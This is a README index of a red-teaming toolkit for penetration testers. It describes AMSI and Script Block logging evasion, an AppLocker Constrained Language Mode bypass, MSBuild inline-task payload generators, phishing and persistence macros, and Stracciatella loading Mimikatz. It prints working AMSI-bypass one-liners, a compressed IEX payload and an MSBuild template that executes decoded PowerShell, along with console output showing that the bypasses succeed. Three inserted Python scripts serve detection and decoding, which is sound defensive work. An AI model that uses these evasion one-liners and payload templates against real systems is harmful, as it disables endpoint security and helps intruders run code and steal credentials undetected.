mgeeky-Penetration-Testing-.../red-teaming
Mariusz B. / mgeeky c1df22ba32 Updated Readme
2020-04-30 16:58:14 -04:00

  • backdoor-drop.js - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. (gist)

  • Bypass-ConstrainedLanguageMode - Tries to bypass AppLocker Constrained Language Mode via a custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ). It does so by registering a custom COM object (an InProcServer32 DLL) that acts as a native .NET CLR4 host. This host then loads a managed assembly within its current AppDomain. That assembly finally switches the SessionData.LanguageMode variable, which determines whether Constrained Language Mode is used within the current Runspace. More details in the tool directory itself.

PS >  $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage 
PS > .\Bypass-CLM.ps1
        AppLocker Constrined Language Mode Bypass via COM
        (implementation of: @xpn's technique, as documented in:)
        (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)

        Re-implemented, enhanced by: Mariusz B., mgeeky
        -----

[.] Step 0. Planted DLL files in:
        C:\Users\danj\AppData\Local\Temp\ClmDisableAssembly.dll
        C:\Users\danj\AppData\Local\Temp\ClmDisableDll.dll
[.] Step 1. Creating custom COM object.
[.] Step 2. Invoking it (ClmDisableDll)...
        Powershell runspace Thread ID: 8716
[+] Managed mode assembly. Disabling CLM globally.
        Current thread ID (managed/unmanaged): 8 / 8716
        Passed argument: '(called from native CLR host)'

============
Use below command to disable CLM on Demand (ignore errors):

        PS> New-Object -ComObject ClmDisableDll

============

[+] Finished. CLM status: FullLanguage

PS > New-Object -ComObject ClmDisableDll
PS > $ExecutionContext.SessionState.LanguageMode
FullLanguage 

  • clickOnceSharpPickTemplate.cs - This is a template for a C# Console Project containing the SharpPick technique of loading Powershell code from within a C# application. The ClickOnce concept is to generate a Windows self-updating application that is specially privileged (ClickOnce).

  • cmstp-template.inf - INF file that is the smallest possible template for the CMSTP code execution technique, as described by the LOLBAS project. Sample usage:

cmstp.exe /ni /s cmstp.inf

  • cobalt-arsenal - A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. It includes a couple of handy utils I've used on various engagements.

  • compressedPowershell.py - Creates a Powershell snippet containing a GZIP-compressed payload that will get decompressed and executed (IEX). (gist)

    Example:

$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

  • Count-PrivilegedGroupMembers.ps1 - Counts the number of members in a predefined (or augmented from an input file) list of privileged, sensitive groups in Active Directory. Purely for statistics and overview purposes.

  • delete-warning-div-macro.vbs - VBA Macro function to be used as a Social Engineering trick, removing the "Enable Content" warning message (the topmost floating text box with a given name). (gist)

  • Disable-Amsi.ps1 - Tries to evade AMSI by leveraging a couple of publicly documented techniques, but in an approach that avoids signatured or otherwise considered-harmful keywords.

Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find the required ones by their computed hash value rather than by direct name. Since the hash-value computation algorithm is open-sourced and simple to manipulate, the attacker can customize the hash-lookup scheme however he likes.

PS > "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS > . .\Disable-Amsi.ps1
PS > Disable-Amsi
[+] Disabled Script Block logging.
[+] Success via technique 1.
PS > "amsiInitFailed"
amsiInitFailed

  • OH, by the way - you can grab my custom AMSI evasion oneliners below - perfect for one-shot use cases:

    • Technique 1A: Overwrite AmsiUtils.amsiContext's object (_HAMSICONTEXT.Signature) byte. Length: 146 bytes.
    [Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
    
    • Technique 1B: Same as 1A, but obfuscated variant. (256 bytes)
    $h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
    
  • Disable-ScriptLogging.ps1 - Tries to evade Script Block logging by leveraging a couple of publicly documented techniques, but in an approach that avoids signatured or otherwise considered-harmful keywords.

Warning: This scriptlet should be launched first, before Disable-Amsi.ps1, for a better OpSec experience.

  • Export-ReconData.ps1 - Powershell script leveraging the PowerSploit Recon module (PowerView) to save output from Reconnaissance cmdlets like Get-*, Find-* into Clixml files. Those files (stored in an output directory as separate XML files) can later be extracted from the attacked environment and loaded into a new powershell runspace using the same script. Very useful when we want to obtain as much data as possible, exfiltrate it, review it in our safe place and then get back to the attacked domain for lateral spread. Warning: Be careful though, as this script launches many reconnaissance commands one by one, it WILL generate a lot of noise. Microsoft ATA, for instance, will for sure pick you up with "Reconnaissance using SMB session enumeration" after you've launched Invoke-UserHunter.

    WARNING: This script is compatible with the newer version of PowerView (coming from the dev branch as of 2018), which exposes various Get-Domain*, Find-* cmdlets. In order to save recon data from the older PowerView, refer to my Save-ReconData.ps1 script in this directory.

    Exposed functions:

    • Export-ReconData - Launches many cmdlets and exports their Clixml outputs.
    • Import-ReconData -DirName <DIR> - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
    • Get-ReconData -DirName <DIR> - Gets the names of the variables that were created and contain previously imported data.

PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results.
Loaded $ForeignGroup results.
Loaded $ForeignUser results.
Loaded $GPOLocation results.
Loaded $MapDomainTrust results.
Loaded $NetComputer results.
Loaded $NetDomain results.
Loaded $NetDomainController results.
Loaded $NetDomainTrust results.
Loaded $NetFileServer results.
Loaded $NetForest results.
Loaded $NetForestCatalog results.
Loaded $NetForestDomain results.
Loaded $NetForestTrust results.
Loaded $NetGPO results.
Loaded $NetGPOGroup results.
Loaded $NetGroup results.
Loaded $NetGroupMember results.
Loaded $NetLocalGroup results.
Loaded $NetLoggedon results.
Loaded $NetOU results.
Loaded $NetProcess results.
Loaded $NetRDPSession results.
Loaded $NetSession results.
Loaded $NetShare results.
Loaded $NetSite results.
Loaded $NetSubnet results.
Loaded $NetUserAdminCount results.
Loaded $NetUser results.
Loaded $ShareFinder results.
Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results.

  • Find-GPODelegatedUsers.ps1 - One-liner for finding GPO-delegated users that can Edit Settings of that GPO and thus could be used to abuse GPO permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). (gist)

  • Get-UserPasswordEntries.ps1 - A simple script for finding and decoding userPassword properties stored by some legacy SAMBA/Linux Kerberos implementations.

  • generateMSBuildXML.py - Powershell via MSBuild inline-task XML payload generation script. To be used during Red-Team assignments to launch Powershell payloads without using powershell.exe. (gist)

This script can embed the following data within the constructed CSharp Task:

  • Powershell code
  • raw shellcode to be executed in a separate thread via CreateThread
  • .NET Assembly reflectively loaded via Assembly.Load

Example output, not minimized:

C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1

        :: Powershell via MSBuild inline-task XML payload generation script
        To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
        Mariusz B. / mgeeky, <mb@binary-offensive.com>

[?] File not recognized as PE/EXE.

------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

  <!--  Based on Casey Smith work, Twitter: @subTee                              -->
  <!--  Automatically generated using `generateMSBuildXML.py` utility  -->
  <!--  by Mariusz B. / mgeeky <mb@binary-offensive.com>                         -->

  <Target Name="btLDoraXcZV">
    <hwiJYmWvD />
  </Target>
  <UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
    <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs">
        <![CDATA[
            using System.Management.Automation;
            using System.Management.Automation.Runspaces;
            using Microsoft.Build.Framework;
            using Microsoft.Build.Utilities;

            public class hwiJYmWvD : Task {
                public override bool Execute() {

                    byte[] payload = System.Convert.FromBase64String("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");
                    string decoded = System.Text.Encoding.UTF8.GetString(payload);

                    Runspace runspace = RunspaceFactory.CreateRunspace();
                    runspace.Open();

                    Pipeline pipeline = runspace.CreatePipeline();
                    pipeline.Commands.AddScript(decoded);
                    pipeline.Invoke();

                    runspace.Close();
                    return true;
                }
            }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>
------------------------------------------------------------------------------------

Example output, minimized:

C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m

        :: Powershell via MSBuild inline-task XML payload generation script
        To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
        Mariusz B. / mgeeky, <mb@binary-offensive.com>

[?] File not recognized as PE/EXE.

------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="mYOYInAFWE"><DpaYaokgauWBJbe /></Target><UsingTask TaskName="DpaYaokgauWBJbe" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class DpaYaokgauWBJbe:Task{public override bool Execute(){byte[] x=System.Convert.FromBase64String("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");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=RunspaceFactory.CreateRunspace();r.Open();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]></Code></Task></UsingTask></Project>
------------------------------------------------------------------------------------
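From the defender's side, the generated project above has a recognisable shape: a UsingTask built by CodeTaskFactory, a reference to System.Management.Automation, a Runspace opened from inline C#, and a large Base64 blob. The following parser, added here as an example and not part of mgeeky's repository, flags exactly that structure in an MSBuild project file; both sample projects are constructed and the blob is filler.

```python
"""Triage MSBuild project files for inline-code tasks (added example)."""
import re
import xml.etree.ElementTree as ET

# Task factories that compile source at build time (RoslynCodeTaskFactory is
# the newer equivalent of CodeTaskFactory).
INLINE_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}
# A quoted run of 64+ Base64 characters inside the inline source code.
BASE64_BLOB_RE = re.compile(r'"([A-Za-z0-9+/]{64,}={0,2})"')

# Constructed sample shaped like the generateMSBuildXML.py output above; the
# FromBase64String argument is filler ("QUJD" repeated), not a real payload.
SUSPICIOUS_PROJECT = r"""<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="btLDoraXcZV"><hwiJYmWvD /></Target>
  <UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Reference Include="System.Management.Automation" />
      <Code Type="Class" Language="cs"><![CDATA[
        using System.Management.Automation.Runspaces;
        public class hwiJYmWvD : Microsoft.Build.Utilities.Task {
          public override bool Execute() {
            byte[] payload = System.Convert.FromBase64String("%s");
            Runspace r = RunspaceFactory.CreateRunspace(); r.Open();
            Pipeline p = r.CreatePipeline();
            p.Commands.AddScript(System.Text.Encoding.UTF8.GetString(payload));
            p.Invoke(); r.Close(); return true;
          }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>""" % ("QUJD" * 20)

# Constructed ordinary build file: precompiled tasks only, nothing inline.
BENIGN_PROJECT = r"""<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Csc Sources="Program.cs" /></Target>
</Project>"""


def _local(tag):
    """Strip the XML namespace so old-style and SDK-style projects both match."""
    return tag.rsplit("}", 1)[-1]


def find_inline_tasks(project_xml):
    """Return one finding dict per UsingTask that compiles source at build time."""
    root = ET.fromstring(project_xml)
    findings = []
    for task in root.iter():
        if _local(task.tag) != "UsingTask":
            continue
        factory = task.get("TaskFactory", "")
        if factory not in INLINE_FACTORIES:
            continue  # precompiled task assembly: not what this check targets
        name = task.get("TaskName", "")
        refs = [e.get("Include", "") for e in task.iter() if _local(e.tag) == "Reference"]
        code = "".join(e.text or "" for e in task.iter() if _local(e.tag) == "Code")
        # A Target invokes the task through a child element named after it.
        callers = [t.get("Name", "") for t in root.iter()
                   if _local(t.tag) == "Target" and any(_local(c.tag) == name for c in t)]
        findings.append({
            "task_name": name,
            "factory": factory,
            "invoked_by": callers,
            "references": refs,
            "powershell_host": "System.Management.Automation" in refs or "Runspace" in code,
            "base64_blob_lengths": [len(b) for b in BASE64_BLOB_RE.findall(code)],
        })
    return findings


def is_suspicious(finding):
    """Inline code that hosts PowerShell or embeds a large blob deserves a look."""
    return finding["powershell_host"] or bool(finding["base64_blob_lengths"])


if __name__ == "__main__":
    for f in find_inline_tasks(SUSPICIOUS_PROJECT):
        print(("SUSPICIOUS " if is_suspicious(f) else "inline ") + repr(f))
```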

  • Get-DomainOUTree.ps1 - Collects OU lines returned from PowerView's Get-NetOU/Get-DomainOU cmdlet and then prints that structure as an Organizational Units tree.

This scriptlet works both with the older version of PowerView that implements the Get-NetOU cmdlet, by passing its output via the pipeline to Get-NetOUTree:

PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree

or with the new version of PowerView, which comes with its Get-DomainOU cmdlet:

PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
+ CONTOSO
   + SharedFolders
   + Departments
      + IT
      + SALES
      + LAWYERS
      + CHIEFS
      + AUDIT
      + HR
   + Software
   + Computers
      + Workstations
      + Servers
         + Data
         + Infrastructure
         + SOC
   + Groups
   + Users
      + Partners
      + Employees
      + Admins
+ Domain Controllers
+ Microsoft Exchange Security Groups
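The tree above is just the OU distinguishedNames nested by their parent RDNs. The script below, an added example that is not part of mgeeky's repository, reimplements that idea in Python so OU DNs exported from PowerView (for instance via Export-ReconData.ps1) can be rendered offline in the same "+ name" layout; the DNs are constructed and include an escaped comma and a child listed before its parent.

```python
"""Render Active Directory OUs as a tree from distinguishedName values (added example)."""
import re

# Constructed sample in the shape Get-DomainOU returns. "OU=SOC,..." appears
# before its parent "Servers", and "OU=R\,D,..." carries an escaped comma.
SAMPLE_OU_DNS = [
    "OU=Domain Controllers,DC=contoso,DC=local",
    "OU=SOC,OU=Servers,OU=Computers,DC=contoso,DC=local",
    "OU=Servers,OU=Computers,DC=contoso,DC=local",
    "OU=Workstations,OU=Computers,DC=contoso,DC=local",
    "OU=Admins,OU=Users,DC=contoso,DC=local",
    "OU=Employees,OU=Users,DC=contoso,DC=local",
    r"OU=R\,D,OU=Departments,DC=contoso,DC=local",
]


def split_dn(dn):
    """Split a DN into (attribute, value) pairs, leaf first, honouring escaped commas."""
    rdns = []
    for part in re.split(r"(?<!\\),", dn):  # split only on unescaped commas
        attr, _, value = part.partition("=")
        rdns.append((attr.strip().upper(), value.strip().replace("\\,", ",")))
    return rdns


def build_ou_tree(dns):
    """Return nested dicts: {domain: {ou: {child_ou: {...}}}}."""
    tree = {}
    for dn in dns:
        rdns = split_dn(dn)
        domain = ".".join(v for a, v in rdns if a == "DC")  # e.g. contoso.local
        node = tree.setdefault(domain, {})
        # OUs nest root-first, i.e. the reverse of the DN's leaf-first order.
        # setdefault also creates parents that have no DN of their own in the input.
        for ou in reversed([v for a, v in rdns if a == "OU"]):
            node = node.setdefault(ou, {})
    return tree


def render_tree(tree, depth=0):
    """Render the tree as '+ name' lines, indented three spaces per level."""
    lines = []
    for name in sorted(tree):
        lines.append("   " * depth + "+ " + name)
        lines.extend(render_tree(tree[name], depth + 1))
    return lines


def count_ous(tree):
    """Number of OU nodes below the domain roots (the roots themselves excluded)."""
    def nodes(sub):
        return sum(1 + nodes(children) for children in sub.values())
    return sum(nodes(children) for children in tree.values())


if __name__ == "__main__":
    ou_tree = build_ou_tree(SAMPLE_OU_DNS)
    print("\n".join(render_tree(ou_tree)))
    print("OUs:", count_ous(ou_tree))
```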

  • Handy-BloodHound-Cypher-Queries.md - A list of BloodHound Cypher queries that I came up with during my various Active Directory security assessments (the list also includes some of my colleagues' queries). (gist)

  • Invoke-Command-Cred-Example.ps1 - Example of using PSRemoting with credentials passed directly from command line. (gist)

  • MacroDetectSandbox.vbs - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. (gist)

  • Macro-Less-Cheatsheet.md - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet (gist)

  • macro-psh-stdin-author.vbs - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. (gist)

  • malleable_redirector - A proxy2 plugin for resilient, evasive C2 infrastructures, covering your redirectors from AV/EDR/Sandbox/IR lurking eyes based on the specified Cobalt Strike Malleable C2 profile. Combines the advantages of classic evasion techniques such as Apache2 mod_rewrite/.htaccess and deep, C2-profile-driven HTTP/HTTPS request inspection.

  • markOwnedNodesInNeo4j.py - This script takes an input file containing node names to be marked in the Neo4j database as owned = True. This strategy for working with Neo4j and BloodHound becomes fruitful during complex Active Directory security review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, gained access to a set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark those principals as owned, which will enrich your future use of BloodHound.

$ ./markOwnedNodesInNeo4j.py kerberoasted.txt
[.] Connected to neo4j instance.
[.] Marking nodes (0..10) ...
[+] Marked 10 nodes in 4.617 seconds. Finish ETA: in 16.622 seconds.
[.] Marking nodes (10..20) ...
[+] Marked 10 nodes in 4.663 seconds. Finish ETA: in 12.064 seconds.
[.] Marking nodes (20..30) ...
[+] Marked 10 nodes in 4.157 seconds. Finish ETA: in 7.167 seconds.
[.] Marking nodes (30..40) ...
[+] Marked 10 nodes in 4.365 seconds. Finish ETA: in 2.670 seconds.
[.] Marking nodes (40..46) ...
[+] Marked 6 nodes in 2.324 seconds. Finish ETA: in 0 seconds.
[+] Nodes marked as owned successfully in 20.246 seconds.

  • msbuild-powershell-msgbox.xml - Example of Powershell execution via an MSBuild inline task XML file, on a simple Message-Box script. (gist)

  • muti-stage-1.md - Multi-stage Penetration Testing / Red Teaming malicious Word document creation process. (gist)

  • Phish-Creds.ps1 - Powershell one-liner Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on a seized machine. (gist)

    One can additionally add the following parameters, right after Get-Credential, to improve the pretext's quality during a social engineering attempt:

    • -Credential domain\username - when we know our victim's domain and/or username, we can supply this info to the dialog
    • -Message "Some luring sentence" - to include some luring message

  • PhishingPost - PHP script intended to be used during phishing campaigns as a credentials collector, linked from a backdoored HTML action parameter.

  • regsvcs - Set of scripts, requirements and instructions for generating .NET Assemblies valid for Regasm/Regsvcs code execution primitives.

  • RobustPentestMacro - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.

  • Save-ReconData.ps1 - Powershell script leveraging the PowerSploit Recon module (PowerView) to save output from Reconnaissance cmdlets like Get-*, Find-* into Clixml files. It differs from Export-ReconData.ps1 in that it supports only the older PowerView version from before 12 Dec 2016. Exposed functions:

    • Save-ReconData - Launches many cmdlets and exports their Clixml outputs.
    • Load-ReconData -DirName <DIR> - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
    • Get-ReconData -DirName <DIR> - Gets the names of the variables that were created and contain previously imported data.

  • set-handler.rc - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. (gist)

  • Stracciatella - Powershell runspace from within C# (aka SharpPick technique) with AMSI and Script Block Logging disabled for your pleasure.

    • This program provides functionality to decode passed parameters on the fly, using Base64 and Xor single-byte decode (also combined)
    • Before launching any command, it makes sure to disable AMSI using two approaches
    • Before launching any command, it makes sure to disable Script Block logging using two approaches
    • This program does not patch any system library, system native code (think amsi.dll)
    • Efforts were made to not store decoded script/commands excessively long, in order to protect itself from memory-dumping techniques governed by EDRs and AVs
    • The resulting binary may be considered a bit too large; that's because the Costura.Fody NuGet package is used, which bundles System.Management.Automation.dll within the resulting assembly.

PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1

  :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
  Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>

[.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage

PS> & '.\Test2.ps1'
PS> Write-Host "It works like a charm!" ; $ExecutionContext.SessionState.LanguageMode
[+] Yeeey, it really worked.
It works like a charm!
FullLanguage

PS D:\> "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS D:\> . .\Invoke-Mimikatz.ps1
At line:1 char:1
+ . .\Invoke-Mimikatz.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

PS D:\> .\Stracciatella.exe -v

  :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
  Mariusz B. / mgeeky, '19 <mb@binary-offensive.com>

[-] It looks like no script path was given.
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage

Stracciatella D:\> . .\Invoke-Mimikatz.ps1

Stracciatella D:\> Invoke-Mimikatz -Command "coffee ; exit"

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

mimikatz(powershell) # ;
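Both encodings shown on this page are easy to reverse once they turn up in a process-creation or script-block log: the compressedPowershell.py one-liner is Base64 of a GZIP stream fed to IEX, and Stracciatella's "-b -x <key> -c <blob>" arguments are Base64 followed by a single-byte XOR. The triage helper below is an added example, not code from mgeeky's repository; the GZIP sample is built from a harmless constructed script, while the XOR sample is the argument from the Stracciatella run above.

```python
"""Recover plaintext from the two encoded-command formats on this page (added example)."""
import base64
import gzip
import re

GZIP_ONELINER_RE = re.compile(r'''FromBase64String\(['"]([A-Za-z0-9+/=]+)['"]\)''')
STRACCIATELLA_RE = re.compile(r'-x\s+(0x[0-9a-fA-F]{1,2}|\d{1,3})\s+-c\s+"([A-Za-z0-9+/=]+)"')

# Argument list exactly as in the Stracciatella example above.
SAMPLE_STRACCIATELLA_CMDLINE = (
    r'Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQ'
    r'EVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" '
    r".\Test2.ps1")


def make_gzip_oneliner(script):
    """Build the compressedPowershell.py one-liner shape; used here only to construct a sample."""
    blob = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    return ("$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('%s'));"
            "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, "
            "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" % blob)


def decode_gzip_oneliner(command_line):
    """Return the script hidden in a Base64+GZIP one-liner, or None if it is not that format."""
    m = GZIP_ONELINER_RE.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    if raw[:2] != b"\x1f\x8b":  # no gzip magic: some other FromBase64String use
        return None
    return gzip.decompress(raw).decode("utf-8", errors="replace")


def decode_xor_base64(blob, key):
    """Base64-decode, then XOR every byte with a single-byte key."""
    data = base64.b64decode(blob)
    return bytes(b ^ (key & 0xFF) for b in data).decode("utf-8", errors="replace")


def decode_stracciatella_args(command_line):
    """Return the command passed via -b -x <key> -c <blob>, or None if absent."""
    m = STRACCIATELLA_RE.search(command_line)
    if not m:
        return None
    key_text = m.group(1)
    key = int(key_text, 16) if key_text.lower().startswith("0x") else int(key_text)
    return decode_xor_base64(m.group(2), key)


def triage_command_line(command_line):
    """Try each known encoding; return (format_name, plaintext) or (None, None)."""
    for name, decoder in (("base64+gzip", decode_gzip_oneliner),
                          ("base64+xor", decode_stracciatella_args)):
        plaintext = decoder(command_line)
        if plaintext is not None:
            return name, plaintext
    return None, None


if __name__ == "__main__":
    print(triage_command_line(SAMPLE_STRACCIATELLA_CMDLINE))
    print(triage_command_line(make_gzip_oneliner("Write-Host 'constructed sample'")))
```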

  • SubstitutePageMacro.vbs - This is a template for malicious macros that substitute the primary contents of the document (like luring/fake warnings to "Enable Content") with what is inside an AutoText named RealDoc (configured via the variable autoTextTemplateName). (gist)

  • warnings\EN-Word.docx and warnings\EN-Excel.docx - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.

  • WMIPersistence.vbs - Visual Basic Script implementing the WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup roughly 3 minutes after the system boots. (gist)

  • Various-Macro-Based-RCEs.md - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. (gist)

  • vba-macro-mac-persistence.vbs - (WIP) Working on VBA-based Mac persistence functionality for MS Office for Mac macros. (gist)

  • vba-windows-persistence.vbs - VBA script implementing two Windows persistence methods - via a WMI EventFilter object and via the simple Registry Run key. (gist)

  • VisualBasicObfuscator - Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.